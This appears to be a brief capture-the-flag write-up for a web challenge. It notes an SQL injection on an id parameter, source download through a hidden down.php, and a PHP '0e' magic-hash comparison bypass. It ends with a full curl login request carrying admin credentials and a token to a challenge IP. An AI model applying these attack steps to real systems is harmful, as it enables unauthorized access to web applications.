SQL injectable on parameter id=1

Find the down.php script mentioned in a hidden post to download raw source.

Then PHP bug on the 0e hash (use brute.php to solve)

curl -D - 'http://175.119.158.137:9242/f00885da9ad9ad5fcccaa8fc1217e3ae/login_ck.php' -H 'Pragma: no-cache' -H 'Origin: http://175.119.158.137:9242' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.8' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Cache-Control: no-cache' -H 'Referer: http://175.119.158.137:9242/f00885da9ad9ad5fcccaa8fc1217e3ae/login.php' -H 'Cookie: PHPSESSID=uphnsquhbls9q7kn5jq8313hs6' -H 'Connection: keep-alive' --data 'user=admin&pass=adminpw&token=38663978' --compressed; echo